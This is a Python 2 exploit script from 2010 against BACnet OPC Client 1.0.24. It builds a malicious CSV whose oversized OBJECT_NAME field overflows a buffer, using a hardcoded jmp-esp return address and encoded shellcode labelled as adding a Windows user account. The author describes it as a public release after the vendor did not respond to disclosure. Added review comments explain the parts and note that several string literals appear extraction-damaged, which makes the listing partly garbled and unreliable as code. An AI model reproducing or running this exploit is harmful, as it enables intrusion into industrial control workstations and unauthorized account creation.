
# Title : BACnet OPC Client Buffer Overflow Exploit
# Published : 2010-09-16
# Author : Jeremy Brown


#!/usr/bin/python
# bacnet.py
# BACnet OPC Client Buffer Overflow Exploit
# Jeremy Brown [0xjbrown41-gmail-com]
# Sept 2010
# 
# After communicating via several emails with the vendor, sharing details
# about the vulnerability, as well as proof-of-concept code (I also offered
# to send the exploit code for them to test themselves), it was clear that
# they weren't very interested in fixing the vulnerability. They even ended our
# conversation with "Hi Jeremy, thanks but please don't waste my time.", and
# quickly became unresponsive to further communication. A couple days later, I
# notified them of my plans to release exploit code to the public, proving
# the vulnerability, since they weren't planning on releasing a fix. They didn't
# respond with anything indicating plans for an update, so maybe this will help.
#
# If you are a customer (they seem to care much more about your concerns), I would
# suggest contacting support at scadaengine.com and ask them to issue a fix.
#
# Successfully tested on Windows XP Service Pack 3 with BACnet OPC Client 1.0.24
#

import sys
import struct

# Saved-return-address overwrite value.  The address is tied to the
# user32.dll build of the platform named in the header (XP SP3); the
# script performs no target check, so on any other build it is just an
# arbitrary pointer.
ret=0x7C96BF33 # jmp esp @ user32.dll

# Filler preceding the return address inside the OBJECT_NAME field;
# presumably the measured distance to the saved return on the tested
# build — not verified here.
junk="B"*185

# Payload as labelled by the author's generator comment below.  The
# label suggests it creates a local Windows account (USER/PASS shown),
# which would be the host-side artifact to look for after a suspect CSV
# import — confirm against the decoded bytes rather than the name.
# NOTE(review): the string escapes in this listing appear
# extraction-damaged; treat the lines as a transcription, not as data.
# win32_adduser -  PASS=ware EXITFUNC=thread USER=sploit Size=497 Encoder=PexAlphaNum
payload=(
"xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49"
"x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36"
"x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34"
"x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41"
"x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4ax4ex46x54"
"x42x30x42x50x42x50x4bx48x45x44x4ex53x4bx58x4ex37"
"x45x30x4ax37x41x50x4fx4ex4bx58x4fx34x4ax51x4bx58"
"x4fx45x42x52x41x30x4bx4ex49x44x4bx58x46x33x4bx38"
"x41x50x50x4ex41x33x42x4cx49x49x4ex4ax46x38x42x4c"
"x46x37x47x30x41x4cx4cx4cx4dx30x41x50x44x4cx4bx4e"
"x46x4fx4bx33x46x55x46x32x46x50x45x57x45x4ex4bx58"
"x4fx55x46x42x41x30x4bx4ex48x36x4bx58x4ex30x4bx54"
"x4bx58x4fx45x4ex51x41x30x4bx4ex4bx58x4ex41x4bx48"
"x41x50x4bx4ex49x48x4ex55x46x42x46x30x43x4cx41x43"
"x42x4cx46x46x4bx58x42x44x42x53x45x38x42x4cx4ax57"
"x4ex30x4bx58x42x54x4ex30x4bx58x42x47x4ex31x4dx4a"
"x4bx58x4ax56x4ax50x4bx4ex49x30x4bx38x42x48x42x4b"
"x42x30x42x30x42x30x4bx58x4ax36x4ex43x4fx55x41x43"
"x48x4fx42x36x48x45x49x38x4ax4fx43x58x42x4cx4bx57"
"x42x35x4ax36x4fx4ex50x4cx42x4ex42x36x4ax46x4ax49"
"x50x4fx4cx48x50x30x47x35x4fx4fx47x4ex43x46x4dx36"
"x46x56x50x32x45x36x4ax57x45x46x42x32x4fx42x43x56"
"x42x42x50x36x45x36x46x57x42x52x45x57x43x47x45x36"
"x44x37x42x32x43x47x42x57x4ex36x4fx46x49x36x46x57"
"x42x32x47x37x41x46x44x57x45x46x42x42x4fx42x41x34"
"x46x34x46x44x42x32x48x42x48x42x42x52x50x36x45x56"
"x46x47x42x42x4ex46x4fx56x43x46x41x36x4ex56x47x56"
"x44x47x4fx36x45x47x42x37x42x42x41x54x46x56x4dx36"
"x49x46x50x56x49x36x43x47x46x47x44x57x41x56x46x57"
"x4fx46x44x47x43x37x42x42x43x47x42x47x4ex46x4fx36"
"x49x46x46x47x42x32x4fx32x41x34x46x34x46x34x42x50"
"x5a"
)

# CSV header row and trailing row that frame the oversized field.
# NOTE(review): as listed, these two literals look extraction-damaged
# (the `\"` at the end of the first leaves it unterminated, and `\s` is
# not a recognized escape), so the script does not parse in this form.
csv1="OPC_TAG_NAME,OBJECT_TYPE,INSTANCE,OBJECT_NAMEn\";
csv2="\scada,0,0,n";

# Python 2 script: `print` statements and `except X, e` syntax below.
if len(sys.argv)<2:
	print "Usage: "+sys.argv[0]+" <filename.csv>"
	sys.exit(0)


# Output path taken verbatim from the command line; the name shadows the
# Python 2 builtin `file`.
file=sys.argv[1]

# Little-endian packing of the 32-bit return address.
retaddr=struct.pack("<L",ret)

# One CSV record whose OBJECT_NAME field carries: filler, the return
# address, 4 bytes of padding ("X"*4), then the payload.  This script's
# only artifact is the written file; the overflow itself happens in the
# client that later imports it.  From the defensive side, the triggering
# condition is an OBJECT_NAME value far longer than any legitimate name —
# presumably an importer-side length bound would reject it, though the
# vulnerable copy is not visible here.
csv=csv1+junk+retaddr+"X"*4+payload+csv2

# The handle is closed only on the success path; a `with` block would be
# the usual form.  Only IOError is handled, and the failure is printed
# rather than reflected in the exit status.
try:
     f=open(file,"w")
     f.write(csv)
     f.close()

except IOError,e:
     print e

else:
     print "Open %s in the OPC client to exploit the vulnerability." % file